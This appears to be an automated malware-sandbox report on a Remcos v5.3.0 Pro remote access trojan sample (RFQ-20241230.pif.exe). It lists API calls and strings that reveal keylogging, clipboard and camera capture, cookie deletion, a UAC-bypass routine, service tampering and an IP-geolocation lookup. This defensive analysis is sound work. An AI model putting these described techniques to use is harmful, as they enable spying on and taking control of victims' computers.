                            • _ValidateLocalCookies.LIBCMT ref: 00437B51
                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B7C
                            • _ValidateLocalCookies.LIBCMT ref: 00437BD1
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                            • String ID: csm
                            • API String ID: 1170836740-1018135373
                            • Opcode ID: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                            • Instruction ID: 71a827b8039fc8fef17eb0172cb9efd804432aff4b2936af944e1c8a38ed202f
                            • Opcode Fuzzy Hash: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                            • Instruction Fuzzy Hash: 07410870A04209DBCF20EF29C884A9FBBB4AF08328F149156E8556B352D739EE01CF95
                            APIs
                              • Part of subcall function 00412513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00412537
                              • Part of subcall function 00412513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00412554
                              • Part of subcall function 00412513: RegCloseKey.KERNELBASE(?), ref: 0041255F
                            • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                            • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                            • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                            • API String ID: 1133728706-4073444585
                            • Opcode ID: 951235f85e48bb3d128a26db13e089d8687f47fe997c8e03be2a900eced236d5
                            • Instruction ID: c183ecd3189b8021203cc80da109e2de7a31ac9d6a13988019f9cddb43f3bc3e
                            • Opcode Fuzzy Hash: 951235f85e48bb3d128a26db13e089d8687f47fe997c8e03be2a900eced236d5
                            • Instruction Fuzzy Hash: 84216D71900219A6CB04F7B2DCA69EE7764AE95318F40013FA902771D2EB7C9A49C6DE
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6057a514b4ba5577cbf71135f50799e40bb9a98b40ca9e941afdb8321a510a32
                            • Instruction ID: c456bd3af877b6cafd4b53f13a87e342c7fa5de46f767ee01c057a6e18c8cad8
                            • Opcode Fuzzy Hash: 6057a514b4ba5577cbf71135f50799e40bb9a98b40ca9e941afdb8321a510a32
                            • Instruction Fuzzy Hash: 401102B1508615FBDB206F729C4593B7BACEF82772B20016FFC05C6242DA3CC801D669
                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                            • int.LIBCPMT ref: 0040FC0F
                              • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                              • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                            • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                            • String ID: p[G
                            • API String ID: 2536120697-440918510
                            • Opcode ID: 90cee4c0c16813870b1da6ceaa83cd64951b4a88db33a7eee00d1c8ab7d48ea7
                            • Instruction ID: 57388c14a05e53b5f50c1e79e3c37d993a50775a9f2b0ccff9e8b1bf96635e0f
                            • Opcode Fuzzy Hash: 90cee4c0c16813870b1da6ceaa83cd64951b4a88db33a7eee00d1c8ab7d48ea7
                            • Instruction Fuzzy Hash: BD110232904519A7CB10FBA5D8469EEB7289E84358F20007BF805B72C1EB7CAF45C78D
                            APIs
                            • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A54E
                            • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A564
                            • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A57D
                            • InternetCloseHandle.WININET(00000000), ref: 0041A5C3
                            • InternetCloseHandle.WININET(00000000), ref: 0041A5C6
                            Strings
                            • http://geoplugin.net/json.gp, xrefs: 0041A55E
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleOpen$FileRead
                            • String ID: http://geoplugin.net/json.gp
                            • API String ID: 3121278467-91888290
                            • Opcode ID: d6f499ad1e8f2f32babf086a4b04f4711f6d8a57175f587e6094264b919902b7
                            • Instruction ID: 987b679836a9d55d587b89d74e0435f254c545d991055b4d64d2ada4334a4818
                            • Opcode Fuzzy Hash: d6f499ad1e8f2f32babf086a4b04f4711f6d8a57175f587e6094264b919902b7
                            • Instruction Fuzzy Hash: C111C4311093126BD224EA169C45DBF7FEDEF86365F00043EF905E2192DB689848C6BA
                            APIs
                              • Part of subcall function 0044FA32: _free.LIBCMT ref: 0044FA5B
                            • _free.LIBCMT ref: 0044FD39
                              • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                              • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                            • _free.LIBCMT ref: 0044FD44
                            • _free.LIBCMT ref: 0044FD4F
                            • _free.LIBCMT ref: 0044FDA3
                            • _free.LIBCMT ref: 0044FDAE
                            • _free.LIBCMT ref: 0044FDB9
                            • _free.LIBCMT ref: 0044FDC4
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                            • Instruction ID: b610107d28af63220697d29f7fc6270dd0ec529a0d2d9973413717ad3690abbb
                            • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                            • Instruction Fuzzy Hash: B5116071581B44ABE520F7B2CC07FCB77DDDF02708F404C2EB29E76052EA68B90A4655
                            APIs
                            • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\RFQ-20241230.pif.exe), ref: 00406835
                              • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                              • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                            • CoUninitialize.OLE32 ref: 0040688E
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: InitializeObjectUninitialize_wcslen
                            • String ID: C:\Users\user\Desktop\RFQ-20241230.pif.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                            • API String ID: 3851391207-3056437607
                            • Opcode ID: 37e49e74ace5e8c7de8c35aba96b6244217e4573d21f95b04fe8e6107b657e82
                            • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                            • Opcode Fuzzy Hash: 37e49e74ace5e8c7de8c35aba96b6244217e4573d21f95b04fe8e6107b657e82
                            • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                            • int.LIBCPMT ref: 0040FEF2
                              • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                              • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                            • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                            • String ID: h]G
                            • API String ID: 2536120697-1579725984
                            • Opcode ID: d8f58f918af87aba8139413509f4a2dec583dfadb59aca9c2e42155b8cc16817
                            • Instruction ID: faa6495482ffb760010bfa20be6f485864068761b5f97391b19e5f0bde606c56
                            • Opcode Fuzzy Hash: d8f58f918af87aba8139413509f4a2dec583dfadb59aca9c2e42155b8cc16817
                            • Instruction Fuzzy Hash: 10119D3190041AABCB24FBA5C8468DDB7699E85718B20057FF505B72C1EB78AE09C789
                            APIs
                            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                            • GetLastError.KERNEL32 ref: 0040B2EE
                            Strings
                            • UserProfile, xrefs: 0040B2B4
                            • [Chrome Cookies not found], xrefs: 0040B308
                            • [Chrome Cookies found, cleared!], xrefs: 0040B314
                            • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: DeleteErrorFileLast
                            • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                            • API String ID: 2018770650-304995407
                            • Opcode ID: d66ece4a976f4d448fc3a6911c1cd710a05d5aa7b72c80177d91237d75f1b396
                            • Instruction ID: 57831ae66bbe87b328e3caf482cfdb9a18bfb77b2c204d956758bc207329a0f7
                            • Opcode Fuzzy Hash: d66ece4a976f4d448fc3a6911c1cd710a05d5aa7b72c80177d91237d75f1b396
                            • Instruction Fuzzy Hash: ED01A23164410557CB0477B5DD6B8AF3624ED50708F60013FF802B22E2FE3A9A0586CE
                            APIs
                            • AllocConsole.KERNEL32(00474358), ref: 0041BEC9
                            • ShowWindow.USER32(00000000,00000000), ref: 0041BEE2
                            • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BF07
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Console$AllocOutputShowWindow
                            • String ID: Remcos v$5.3.0 Pro$CONOUT$
                            • API String ID: 2425139147-2527699604
                            • Opcode ID: 0969bb2dc50103f751eab8b76b07649baec71243ec5d0269df0f19859633e99b
                            • Instruction ID: 29466b5f89b818b32aee09a22b3208d506810ef61d6e100b210d0f7536d9046d
                            • Opcode Fuzzy Hash: 0969bb2dc50103f751eab8b76b07649baec71243ec5d0269df0f19859633e99b
                            • Instruction Fuzzy Hash: 3F0121B1980304BAD600FBF29D4BFDD37AC9B14705F5004277648EB193E6BCA554466D
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: (CG$C:\Users\user\Desktop\RFQ-20241230.pif.exe$BG
                            • API String ID: 0-3480541508
                            • Opcode ID: 436699010963ecd03ae3a912ac3b80d145bf64b66cbd996a99d31e723bd19539
                            • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                            • Opcode Fuzzy Hash: 436699010963ecd03ae3a912ac3b80d145bf64b66cbd996a99d31e723bd19539
                            • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                            APIs
                            • __allrem.LIBCMT ref: 00439799
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397B5
                            • __allrem.LIBCMT ref: 004397CC
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397EA
                            • __allrem.LIBCMT ref: 00439801
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043981F
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                            • String ID:
                            • API String ID: 1992179935-0
                            • Opcode ID: 9c67cb4fed110ca44ac0cc586ac5e74db1fc7c48150eab0f41685f45472ef8a2
                            • Instruction ID: 580a0d75dc01f3f4b0c8d364acae3af6b21ca74026922d198920ae34195595c3
                            • Opcode Fuzzy Hash: 9c67cb4fed110ca44ac0cc586ac5e74db1fc7c48150eab0f41685f45472ef8a2
                            • Instruction Fuzzy Hash: 8581FC71A01B069BE724AE69CC82B5F73A8AF89368F24512FF411D7381E7B8DD018758
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: __cftoe
                            • String ID:
                            • API String ID: 4189289331-0
                            • Opcode ID: d690f97f113291c3effb6b8aa28ce687caf39a3cd02d4202bbd0543e6a0dd668
                            • Instruction ID: 51d3defa9bee42a6449c1cbae1767e96f335fc55d8793b788aa7c8c1dec457a3
                            • Opcode Fuzzy Hash: d690f97f113291c3effb6b8aa28ce687caf39a3cd02d4202bbd0543e6a0dd668
                            • Instruction Fuzzy Hash: DE510A72900205ABFB249F598C81FAF77A9EFC9324F25421FF814A6291DB3DDD01866D
                            APIs
                            • Sleep.KERNEL32(00000000), ref: 00403E8A
                              • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: H_prologSleep
                            • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                            • API String ID: 3469354165-462540288
                            • Opcode ID: aa6c569e894ef081ae3a77e9f9792835c9671d76e7273c9a8ca675ac56314457
                            • Instruction ID: a615deab89d52a04eef9df102bd8b4982dd8b49b1eab8c4ad016fc0191aaad38
                            • Opcode Fuzzy Hash: aa6c569e894ef081ae3a77e9f9792835c9671d76e7273c9a8ca675ac56314457
                            • Instruction Fuzzy Hash: E941A330A0420196CA14FB79C816AAD3A655B45704F00413FF809A73E2EF7C9A85C7CF
                            APIs
                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E0C
                            • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E20
                            • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E2D
                            • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419517), ref: 00419E62
                            • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E74
                            • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E77
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Service$CloseHandle$Open$ChangeConfigManager
                            • String ID:
                            • API String ID: 493672254-0
                            • Opcode ID: b1a54bb8a8b8a5801daee02f654969ed363d70646ac738354a8241f6c324f73f
                            • Instruction ID: 40159264159f5a90cd52f9b689d0e8cb5e0ea154c732c405bcbf7063391161e0
                            • Opcode Fuzzy Hash: b1a54bb8a8b8a5801daee02f654969ed363d70646ac738354a8241f6c324f73f
                            • Instruction Fuzzy Hash: 09016D311083107AE3118B34EC1EFBF3B5CDB41B70F00023BF626922D1DA68CE8581A9
                            APIs
                            • GetLastError.KERNEL32(?,?,00437E0D,004377C1), ref: 00437E24
                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E32
                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E4B
                            • SetLastError.KERNEL32(00000000,?,00437E0D,004377C1), ref: 00437E9D
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLastValue___vcrt_
                            • String ID:
                            • API String ID: 3852720340-0
                            • Opcode ID: 91ac95939cd3c96bc489c52a0530c238d3093d1082c7131376b84a6130b97103
                            • Instruction ID: 127a8aaeb23cc4eddae083ca6fcd73be4c6f1963697d6e79a1959115bdf772ac
                            • Opcode Fuzzy Hash: 91ac95939cd3c96bc489c52a0530c238d3093d1082c7131376b84a6130b97103
                            • Instruction Fuzzy Hash: 6701B57211D3159EE63427757C87A272B99EB0A779F20127FF228851E2EF2D4C41914C
                            APIs
                            • GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                            • _free.LIBCMT ref: 00446F06
                            • _free.LIBCMT ref: 00446F2E
                            • SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F3B
                            • SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                            • _abort.LIBCMT ref: 00446F4D
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$_free$_abort
                            • String ID:
                            • API String ID: 3160817290-0
                            • Opcode ID: ee081b98001fac20135d606adf3ebd9ed25e83f06873042332f69cc5cc1fb8f1
                            • Instruction ID: 1b4467ed9408e6c3233579f8e1b56ac98d0768551ab8ff32c5b7efb0424b8365
                            • Opcode Fuzzy Hash: ee081b98001fac20135d606adf3ebd9ed25e83f06873042332f69cc5cc1fb8f1
                            • Instruction Fuzzy Hash: B1F0F93560870027F61273797D46A6F15669BC37B6B26013FF909A2292EE2D8C06411F
                            APIs
                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C3F
                            • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C53
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C60
                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C6F
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C81
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C84
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Service$CloseHandle$Open$ControlManager
                            • String ID:
                            • API String ID: 221034970-0
                            • Opcode ID: 7cfb46db0bd01be278475ff74c7fe9cf9f01c1ce40244ff157d84eb2ddeeab7a
                            • Instruction ID: 508c6a04514e5737773cd2f196b8466aacbf0489f3ca208dfe1df169d6e4b917
                            • Opcode Fuzzy Hash: 7cfb46db0bd01be278475ff74c7fe9cf9f01c1ce40244ff157d84eb2ddeeab7a
                            • Instruction Fuzzy Hash: 93F0F6325403147BD3116B25EC89EFF3BACDB85BA1F000036F941921D2DB68CD4685F5
                            APIs
                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D41
                            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D55
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D62
                            • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D71
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D83
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D86
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Service$CloseHandle$Open$ControlManager
                            • String ID:
                            • API String ID: 221034970-0
                            • Opcode ID: bfc840ceb24970ac6f0157abf75dddf4ec976f1f73edc1b4d2479d4f1225fd6b
                            • Instruction ID: e3947c2d1caeee04707242a29777fdfa1156a9fa4bc9e6dc5536219c00a7af20
                            • Opcode Fuzzy Hash: bfc840ceb24970ac6f0157abf75dddf4ec976f1f73edc1b4d2479d4f1225fd6b
                            • Instruction Fuzzy Hash: 88F0C2325002146BD2116B25FC49EBF3AACDB85BA1B00003AFA06A21D2DB38CD4685F9
                            APIs
                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DA6
                            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DBA
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DC7
                            • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DD6
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DE8
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DEB
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Service$CloseHandle$Open$ControlManager
                            • String ID:
                            • API String ID: 221034970-0
                            • Opcode ID: b33f3c56d08176086889cf85995723947178cb2cbd7dc05acdbbeb3f21c9258b
                            • Instruction ID: 9f0c2abda8e07195e4bf0f321f31a82c7612ecaf5c8047990b3e76cea93c5393
                            • Opcode Fuzzy Hash: b33f3c56d08176086889cf85995723947178cb2cbd7dc05acdbbeb3f21c9258b
                            • Instruction Fuzzy Hash: FAF0C2325002146BD2116B24FC89EFF3AACDB85BA1B00003AFA05A21D2DB28CE4685F8
                            APIs
                            • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                            • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Enum$InfoQueryValue
                            • String ID: [regsplt]$DG
                            • API String ID: 3554306468-1089238109
                            • Opcode ID: 04be85a10a65fedb481150b8bc6c203764df31fda0f784146e603b05117797e8
                            • Instruction ID: a28855c8467dc88eaaa14c2ad720c73ed52e1c745f0e0c0b8cf84a63aeea62c1
                            • Opcode Fuzzy Hash: 04be85a10a65fedb481150b8bc6c203764df31fda0f784146e603b05117797e8
                            • Instruction Fuzzy Hash: 99512E72108345AFD310EF61D995DEBB7ECEF84744F00493EB585D2191EB74EA088B6A
                            APIs
                              • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
                              • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571
                              • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                            • __Init_thread_footer.LIBCMT ref: 0040AEA7
                              • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
                              • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                            • String ID: [End of clipboard]$[Text copied to clipboard]$L]G$P]G
                            • API String ID: 2974294136-4018440003
                            • Opcode ID: d8cc1fc12807fd958afa10ea2d8e05a8c1945a4568a2f4f986646b09a49f41e4
                            • Instruction ID: f936e1d100a0b91fb3cd099947d4fcefdabc4258effb679c9043d151633dcd27
                            • Opcode Fuzzy Hash: d8cc1fc12807fd958afa10ea2d8e05a8c1945a4568a2f4f986646b09a49f41e4
                            • Instruction Fuzzy Hash: EF21B131A002158ACB14FB75D8969EE7374AF54318F50403FF902771E2EF386E5A8A8D
                            APIs
                            • GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                            • wsprintfW.USER32 ref: 0040A905
                              • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: EventLocalTimewsprintf
                            • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                            • API String ID: 1497725170-248792730
